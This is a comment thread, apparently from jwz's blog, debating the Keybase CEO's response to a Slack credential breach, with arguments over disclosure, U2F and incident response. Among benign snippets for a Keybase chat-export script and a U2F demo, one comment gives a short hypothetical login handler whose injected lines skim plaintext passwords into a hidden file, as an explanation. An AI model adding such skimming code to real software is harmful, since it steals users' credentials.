The CEO of Keybase has some things to say about this:
In the subsequent days and weeks, I reset all of my passwords, threw away all my computers, bought new computers, factory-reset my phone, rotated all of my Keybase devices (i.e., rotated my "keys"), and reestablished everything from the ground up. It cost Keybase and me a lot of time, money and stress. In the end, I was pretty sure, but not 100% convinced, that if I had been "rooted", the attackers couldn't follow me to my new setup. But with these things, you can never know for sure. It's a really scary thing to go through. [...]
Also, Slack's announcement seems to say 1% of accounts were still compromised (after 4 years), but we are wondering: how many were compromised then? And what percentage of messages did the compromised accounts have access to? 10%? 50%? Only the hackers know, but it's likely much more than 1%.
And finally, we know the original compromise was in 2015, but I was only notified of a suspicious login in 2019. Were our Dutch friends sifting through our messages for four years before Slack notified us of a suspicious login? [...]
Keybase messages are end-to-end encrypted, and only our users control their decryption keys. A break-in of our servers, even one injecting code, cannot yield unencrypted messages or jeopardize message integrity.
Now, grain of salt and all, being from a competitor, but I'm with Keybase on this one. I can't see any good reason to choose Slack over Keybase unless you are making the decision that you want the slider between "convenience" and "security" to be wayyyyyy over to the left.
I've been lightly using Keybase for a little while now. Setup is definitely complex, but once it's running, it's good at what it does -- which is to say, IRC channels with end-to-end crypto, but also mission-critical EMOJI.
It is sure as shit better than Signal: it doesn't leak your phone number, and is actually open source.
Incidentally, if anyone can tell me how to use the Keybase API to extract the plain-text of my chats, that would be appreciated.
Keybase seems to really not like providing API docs. Instead of maintaining online documentation for the help text they already write and ship with the client, they just tell you to read keybase chat help api. That really, really helps when you're trying to support someone without having Keybase installed, Keybase.
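For what it's worth, here's what I pieced together from the output of keybase chat help api: the CLI takes a JSON request via -m (or on stdin) and answers with JSON, using methods like "list" and "read". A rough Python sketch -- the field names below are what the CLI handed back to me, so treat the exact shapes as assumptions rather than documented API:

```python
import json
import subprocess

def keybase_chat_api(request: dict) -> dict:
    """Hand one JSON request to the local Keybase client via `keybase chat api -m`."""
    out = subprocess.run(
        ["keybase", "chat", "api", "-m", json.dumps(request)],
        capture_output=True, text=True, check=True,
    ).stdout
    return json.loads(out)

# List every conversation, then dump the plain text of each message in it.
convs = keybase_chat_api({"method": "list"})["result"]["conversations"]
for conv in convs:
    channel = conv["channel"]
    msgs = keybase_chat_api(
        {"method": "read", "params": {"options": {"channel": channel}}}
    )["result"]["messages"]
    for m in msgs:
        content = m["msg"]["content"]
        if content["type"] == "text":  # skip reactions, attachments, etc.
            print(channel["name"], ":", content["text"]["body"])
```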
I'm not going to rehash why you're silly about Signal.
I'm here because in the middle of his fun story about supposedly throwing away a lot of expensive gear in a panic, Max says "If the attackers inject server code, 2FA or U2F or any Web-based security practice does little" which is completely wrong, and ought to give pause to anybody who has been following along thinking "This Max guy seems to know what's up".
If Keybase's Slack account had been secured with U2F nothing would have happened. No cancelled ski trip, no bad guys getting into the "definitely not for researching the competitor product" Slack account, no expensive computers trashed, no blog post with opportunity to grow your customer base, er, I mean, tell a funny story.
In U2F the server (where these bad guys apparently had control back in 2015) doesn't know any secrets about the authenticated user. This means there's no way to "steal" durable access, as was done with passwords and would be possible with technologies like TOTP or SecurID tokens.
All those technologies rely on a shared secret. The server must learn the secret as part of the authentication protocol (for passwords it usually tries to forget it again soon after). But U2F isn't like that; something way cleverer happens. In U2F's enrollment process the user's Security Key hands over a "cookie" (the key handle) and a public key minted just for this enrollment, plus a message signed with the matching private key to prove it holds it. It promises that in future, when shown the same cookie again, it will sign a fresh message to prove it still knows the private key.
So bad guys who have access to a server can steal the cookie, and the public key, but neither of those is secret, they're useless to anyone else. And as soon as their control over that server ends, they're locked out, knowing the cookie or public key doesn't let them pretend to be a user, nor does it let them pretend to the user that they're the real server.
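If it helps, here's a toy sketch of that flow in Python (using the pyca/cryptography package). This is just the shape of the idea, not the real protocol -- actual U2F/WebAuthn adds origin binding, signature counters, and attestation on top:

```python
# Toy model of a U2F-style enrollment + login, from the server's point of view.
import os
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

# Enrollment: the Security Key mints a fresh keypair. The private key never
# leaves the device; the server stores only the "cookie" and the PUBLIC key.
device_private = ec.generate_private_key(ec.SECP256R1())
key_handle = os.urandom(32)                             # the "cookie"
server_db = {key_handle: device_private.public_key()}   # nothing secret in here

# Login: the server sends a fresh random challenge, and the device signs it.
challenge = os.urandom(32)
signature = device_private.sign(challenge, ec.ECDSA(hashes.SHA256()))

# Verification: the stored public key checks the signature. An attacker who
# dumped server_db learned nothing that lets them forge this.
try:
    server_db[key_handle].verify(signature, challenge, ec.ECDSA(hashes.SHA256()))
    print("login ok")
except InvalidSignature:
    print("rejected")
```

The whole point is what server_db holds: a random handle and a public key. Steal both and you still can't sign the next challenge.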
But I locked my front door when I went on holidays?! How could the thieves possibly enter?
Welcome to jwz's comment section, anonymous-ish Slack employee. Please also provide us five blow-hard paragraphs about why Slack was right in waiting four years to disclose a major security breach to users.
On the Internet nobody knows you're a dog. But rather than do any work - say, extrapolating from previous interactions - they will start by assuming you're a shill.
No, I'm just here because it annoys me to see people insist that oh, the one thing that would have helped (U2F / WebAuthn) wouldn't have helped, so really they were pretty smart not to use that, and you shouldn't either. And so nothing improves.
Since I'm back working for a tiny startup again we actually have both Slack and Keybase, and doubtless other chat technologies that are used inconsistently and probably were all signed up for with somebody's personal GMail account.
The "burn all the computers" panic would make sense if the attackers used compromised Slack servers to install keyloggers on end-user systems. Someone would probably notice that if it was happening en masse, though. Maybe.
Thing is, neither Keybase nor Slack said anything about key loggers. A logger was installed at the server to capture plaintext passwords--presumably those that are normally received in the clear as part of the Slack service, and which are not available by stealing the database (which contains hashes not plaintext). That detail is important--nobody can reverse a hash of a password generated by a competent password generator. For this article to exist, someone had to collect the plaintext version of Max's password. That task doesn't need a keylogger installed on one of Max's computers--a few extra lines of code on the Slack login server will suffice.
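To make that concrete, here's a hypothetical sketch (not Slack's actual code) of what those few extra lines look like. The database only ever sees bcrypt hashes; the injected lines skim the plaintext on its way through the login handler:

```python
import bcrypt

def handle_login(username: str, password: str, stored_hash: bytes) -> bool:
    # >>> the attacker's "few extra lines": skim credentials in the clear <<<
    with open("/tmp/.harvest", "a") as f:
        f.write(f"{username}:{password}\n")
    # legitimate logic: compare against the salted hash from the database,
    # which is all a thief of the database itself would ever get
    return bcrypt.checkpw(password.encode(), stored_hash)
```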
So the attackers get access to Slack accounts, and sell those to the highest bidders. They probably did it in several small and expensive pieces over a period of 4 years to try to make more money than selling it all at once. Fortunately for them, Slack played along, keeping the stolen passwords valid for years longer than they should have, protecting the commercial value of their stolen assets. It only stopped when so many copies of the data had been sold (and leaked by buyers with worse opsec than Slack) that it became profitable to sell the data back to Slack for a bug bounty.
Seriously, though, Slack's incident response was terrible. Like, "we didn't find your name on a list of a zillion usernames and passwords that were stolen from us, so we're sure you're totally OK, but maybe change your password every few years just in case, or buy a yubikey. Not for any specific reason, or anything, certainly not for any reason we could be sued or prosecuted for. It's just a good idea." As opposed to "it was our turn to have our authentication database compromised this month, please assume your old password has been scratched into the paint of every public lavatory wall and act accordingly."
Well, he did that based on 1) evidence that his Slack account was compromised and 2) evidence that Slack were not being entirely forthcoming about what was actually going on.
It's still absurd overreaction. It would be like burning all your computers because the local pizza joint gave you the wrong toppings one time. "Someone must have compromised my web browser and changed the order! They're using deep malware to prevent any of my tools from detecting them, because even now there are no anchovies on my screen! They might have put implants into the firmware, who knows how deep this thing goes!!!1! Customer service is playing dumb, they must be in on the conspiracy!"
That "more than 90% convinced that Slack had been compromised" hunch was the correct one. It happens all the time. Try signing up for any 10 local businesses with self-managed infrastructure (car dealerships, pizza joints, national cellular carriers, etc): one of them ends up (presumably involuntarily) selling your login data in the first year, and somebody tries at least once to use it. This is why you use different passwords on different sites--not because one of the sites might be compromised one day, but because one of them always is compromised right now.
Also, if you're an executive of a security-focused company, isn't job #1 to isolate yourself and all your machines from any direct impact on operations? If you're using one laptop for root SSH logins on all the company servers and for bouncing office documents back and forth with shareholders and lawyers and for chatting with your buddies on Slack...maybe you're doing it wrong?
Ok, can you take the dick-measuring contest somewhere else now?
I think you need to get out and relax a bit more often
The way I read it, he burned his computers because he was only 90% sure that Slack was compromised, and he was accounting for the presumed corresponding 10% possibility that they got his password from him via an exploit on one of his machines.
Exactly. In fact, that's reasonably clear. He says that Slack 'implied that I was messy with my security practices and was to blame.'
He burned his computers because Slack misled him.
I'm not unclear on the "Slack misled him" part. That is the only part of the article that doesn't read like infosec fanfic.
The customer service scripts for companies like Slack always say "blame the customer" and 99% of the time they're not wrong because 99% of customers are terrible. Max Krohn, security-focused company CEO, co-founder of other security-focused companies, and one-percenter Slack user, should know this, and expect this response by default. He might have even signed off on a similar script for his own company to use on his own customers.
When Slack said "nope all good here", Max should have pivoted to 89% "Slack has been compromised, but their security team doesn't know it yet", 11% "unlikely scenarios where in some cases burning all my own computers might lead to a better outcome than not burning all my own computers." [1] Then watch carefully for more indicators of compromise to see which theory was right, and do the appropriate thing based on evidence...possibly while also spinning up a replacement set of computers just in case the evidence later points to "burn the computers" after all. [2]
Instead, he dropped the 90% probability and went all in on the 10% one, based on Slack's say-so. This is a rookie procedural error, but Max Krohn is no rookie. Mistakes like this are also a potential sign of stress or burnout which can be expected in Max's current gig (and which makes the vacation cancellation especially ironic). Normally, cooler heads on the incident response team point out that the risks don't match the proposed mitigations before computers end up in the trash (there are also evidence collection procedures, threat analysis, etc to be done before then), but maybe things are different when the company is so small that the CEO is also the incident response team.
Black hats exploit these weaknesses. Some troll posted a fake security advisory against a popular Internet service application. It worked for a while--a lot of network defenders blocked ports for a weekend, inconveniencing sysadmins worldwide--but it was all a hoax, there was no software vulnerability. Whoever did that experiment did learn that a lot of site admins are vulnerable to hoax attacks, and in that sense the attack was completely successful. You don't need complicated software if you can find a random junior sysadmin who doesn't ask the right questions under fire.
This Keybase incident is similar, but the hoax was accidental. A Slack robot did its normal notification duties (yes, about a security compromise, but a totally inconsequential one). In response, the Keybase CEO's unchecked paranoia made him attack himself. All the "damage" on the Keybase side is self-inflicted. [3]
Every time I re-read this article I find more WTF. The "security-focused company" doesn't have enough staff to cover for the CEO on vacation, and therefore also doesn't have enough staff to provide necessary internal boundaries against lateral compromise. There's more, but it's all boring small-company-risk-factors stuff.
[1] Or, burn all the computers as an excuse to buy new ones, but that's an unforced personal choice or maybe insurance fraud. Either way, whining about it in public will get attention, but not the good kind.
[2] If you're planning to use that tactic as part of incident response anyway, why not keep a set of clean machines prepared and ready to deploy? A good infosec fanfic writer would answer that question in the story.
[3] An opportunity to run the "burn all the computers" drill at the CEO level of your company doesn't come along every day, so all the costs listed might be money well spent in training for real attacks later on. But, come on, you can schedule drills around people's vacations.
Alrighty, thanks.
Huh, I totally missed that Keybase is now a Slack competitor rather than just a PGP keyserver.
It still confuses me what Keybase really is or what I should use it for. I saw the chat feature, but it seemed more like "yes, you can do that here too now".
We used to say that email was the killer app -- really, any messaging that brings you into the online community is the killer app -- so "every app expands until it also does instant messaging."
K3n.
Only the client of Keybase is open source.